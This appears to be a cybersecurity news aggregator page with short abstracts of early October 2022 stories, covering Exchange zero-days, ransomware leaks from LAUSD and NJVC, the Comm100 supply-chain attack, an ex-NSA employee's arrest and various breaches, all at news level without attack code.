During the intrusion analysis of DeftTorero’s webshells, researchers noted traces suggesting that the threat actor exploited a file upload form and/or a command injection flaw in a functional or staging website hosted on the target web server.Securelist
October 03, 2022 – Insider Threat
Ex-NSA Employee Arrested for Trying to Sell U.S. Secrets to a Foreign Government Full Text
Abstract
A former U.S. National Security Agency (NSA) employee has been arrested on charges of attempting to sell classified information to a foreign spy, who was actually an undercover agent working for the Federal Bureau of Investigation (FBI). Jareh Sebastian Dalke, 30, was employed at the NSA for less than a month from June 6, 2022, to July 1, 2022, serving as an Information Systems Security Designer as part of a temporary assignment in Washington D.C. According to an affidavit filed by the FBI, Dalke was also a member of the U.S. Army from about 2015 to 2018 and held a Secret security clearance, which he received in 2016. The defendant further held a Top Secret security clearance during his tenure at the NSA. "Between August and September 2022, Dalke used an encrypted email account to transmit excerpts of three classified documents he had obtained during his employment to an individual Dalke believed to be working for a foreign government," the Justice Department (DoJ) sai...The Hacker News
October 3, 2022 – Vulnerabilities
Reflected XSS bugs in Canon Medical’s Vitrea View could expose patient info Full Text
Abstract
Trustwave researchers discovered two XSS flaws in Canon Medical’s Vitrea View tool that could expose patient information. During a penetration test, Trustwave Spiderlabs’ researchers discovered two reflected cross-site scripting (XSS) vulnerabilities,...Security Affairs
October 03, 2022 – Phishing
Web browser app mode can be abused to make desktop phishing pages Full Text
Abstract
The app mode in Chromium-based browsers like Google Chrome and Microsoft Edge can be abused to create realistic-looking login screens that appear as desktop apps.BleepingComputer
October 3, 2022 – Breach
Commercial Chat Provider Comm100 Hijacked to Spread Malware in Supply Chain Attack Full Text
Abstract
The attack featured a trojan malware delivered via an installer for Comm100’s Windows Desktop agent software, available on the company website and signed using a valid Comm100 certificate dated September 26, 2022, according to Crowdstrike.The Record
October 03, 2022 – Vulnerabilities
Microsoft Exchange server zero-day mitigation can be bypassed Full Text
Abstract
Microsoft has shared mitigations for two new Microsoft Exchange zero-day vulnerabilities tracked as CVE-2022-41040 and CVE-2022-41082, but researchers warn that the mitigation for on-premise servers is far from enough.BleepingComputer
October 3, 2022 – Criminals
BlackCat Ransomware Gang Claims to Hack US Defense Contractor NJVC Full Text
Abstract
BlackCat added NJVC to the list of victims on its Tor leak site and is threatening to release the allegedly stolen data if the company will not pay the ransom. The company supports intelligence, defense, and geospatial organizations.Security Affairs
October 02, 2022 – Criminals
Ransomware gang leaks data stolen from LAUSD school system Full Text
Abstract
The Vice Society Ransomware gang published data and documents Sunday morning that were stolen from the Los Angeles Unified School District during a cyberattack earlier this month.BleepingComputer
October 2, 2022 – Criminals
Hackers set Monday deadline for LAUSD to pay up or have private data posted on dark web Full Text
Abstract
A criminal syndicate has set a Monday deadline for the Los Angeles public school system to pay a ransom or have its data released on the dark web, which could potentially expose the confidential information of students and employees.LA Times
October 2, 2022 – Criminals
BlackCat ransomware gang claims to have hacked US defense contractor NJVC
Abstract
Another US defense contractor has suffered a data breach: the BlackCat ransomware gang claims to have hacked NJVC. The ALPHV/BlackCat ransomware gang claims to have breached the IT firm NJVC, which supports the federal government and the United States Department... (Security Affairs)
October 02, 2022 – Government
Russians dodging mobilization behind flourishing scam market
Abstract
Ever since Russian president Vladimir Putin ordered partial mobilization after facing setbacks on the Ukrainian front, men in Russia and the state's conscription officers have been playing a 'cat and mouse' game involving technology and cybercrime services. (BleepingComputer)
October 2, 2022 – General
Security Affairs newsletter Round 386
Abstract
A new round of the weekly SecurityAffairs newsletter has arrived! Every week, the best security articles from Security Affairs are delivered free to your email inbox. If you also want to receive the free newsletter covering the international press, subscribe here. CISA... (Security Affairs)
October 2, 2022 – Criminals
German police identified a gang that stole €4 million via phishing attacks
Abstract
German police arrested one individual suspected of having stolen €4 million from users via large-scale phishing campaigns. Germany's Bundeskriminalamt (BKA) arrested an individual (24) suspected of having stolen €4,000,000 from internet users... (Security Affairs)
October 01, 2022 – Education
Pay What You Want for This Collection of White Hat Hacking Courses
Abstract
Whether you relish a mental challenge or fancy a six-figure paycheck, there are many good reasons to get into white hat hacking. That said, picking up the necessary knowledge to build a new career can seem like a daunting task. There is a lot to learn, after all. To help you get started, The Hacker News Deals is currently running an eye-catching offer: pay what you want for one video course, and get another eight courses if you beat the average price paid. Special Offer: for a limited time, name your price for one cybersecurity course and beat the average price paid to get lifetime access to nine courses. The full bundle is worth $1,668! With thousands of unfilled positions, white hat hacking is a lucrative and exciting career path. This bundle provides a solid introduction to the world of penetration testing and general cybersecurity, with over 65 hours of intensive training. Through concise video tutorials, you learn how to secure your own machine with Kali Linux and (The Hacker News)
October 1, 2022 – Vulnerabilities
SolarMarker Attack Leverages Weak WordPress Sites, Fake Chrome Browser Updates
Abstract
Researchers have discovered the group behind the SolarMarker malware targeting a global tax consulting organization with a presence in the US, Canada, the UK, and Europe, using fake Chrome browser updates as part of watering hole attacks. (Dark Reading)
October 01, 2022 – Hacker
State-Sponsored Hackers Likely Exploited MS Exchange 0-Days Against ~10 Organizations
Abstract
Microsoft on Friday disclosed that a single activity group in August 2022 achieved initial access and breached Exchange servers by chaining the two newly disclosed zero-day flaws in a limited set of attacks aimed at fewer than 10 organizations globally. "These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data exfiltration," the Microsoft Threat Intelligence Center (MSTIC) said in a new analysis. The weaponization of the vulnerabilities is expected to ramp up in the coming days, Microsoft further warned, as malicious actors co-opt the exploits into their toolkits, including deploying ransomware, due to the "highly privileged access Exchange systems confer onto an attacker." The tech giant attributed the ongoing attacks with medium confidence to a state-sponsored organization, adding it was already investigating these attacks when the Zero Day Initiative d (The Hacker News)
October 01, 2022 – Solution
Microsoft to let Office 365 users report Teams phishing messages
Abstract
Microsoft is working on updating Microsoft Defender for Office 365 to allow Microsoft Teams users to alert their organization's security team of any dodgy messages they receive. (BleepingComputer)
October 1, 2022 – Criminals
Cybercriminals See Allure in BEC Attacks Over Ransomware
Abstract
While published trends in ransomware attacks have been contradictory, with some firms tracking more incidents and others fewer, business email compromise (BEC) attacks continue to have proven success against organizations. (Dark Reading)
October 01, 2022 – Government
CISA Warns of Hackers Exploiting Critical Atlassian Bitbucket Server Vulnerability
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a recently disclosed critical flaw impacting Atlassian's Bitbucket Server and Data Center to the Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. Tracked as CVE-2022-36804, the issue relates to a command injection vulnerability that could allow malicious actors to gain arbitrary code execution on susceptible installations by sending a specially crafted HTTP request. Successful exploitation, however, banks on the prerequisite that the attacker already has access to a public repository or possesses read permissions to a private Bitbucket repository. "All versions of Bitbucket Server and Datacenter released after 6.10.17 including 7.0.0 and newer are affected, this means that all instances that are running any versions between 7.0.0 and 8.3.0 inclusive are affected by this vulnerability," Atlassian noted in a late August 2022 advisory. CISA did (The Hacker News)
October 01, 2022 – Vulnerabilities
Lazarus hackers abuse Dell driver bug using new FudModule rootkit
Abstract
The notorious North Korean hacking group 'Lazarus' was seen installing a Windows rootkit that abuses a Dell hardware driver in a Bring Your Own Vulnerable Driver attack. (BleepingComputer)
October 1, 2022 – Government
CISA adds Atlassian Bitbucket Server flaw to its Known Exploited Vulnerabilities Catalog
Abstract
CISA added a recently disclosed flaw in Atlassian Bitbucket Server, tracked as CVE-2022-36804, to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week added a recently disclosed... (Security Affairs)
October 1, 2022 – Breach
Guacamaya hacktivists stole sensitive data from Mexico and Latin American countries
Abstract
A hacker group called Guacamaya stole classified government information from multiple military and government agencies across several Latin American countries. Among the data stolen by the group of hackers called Guacamaya (macaw in Spanish) there was a huge... (Security Affairs)
October 1, 2022 – Breach
Luxury hotel chain Shangri-La suffered a security breach
Abstract
The Shangri-La hotel group disclosed a data breach in which a database containing the personal information of its customers was compromised. The Shangri-La hotel group disclosed a data breach: threat actors had access to a database containing the personal... (Security Affairs)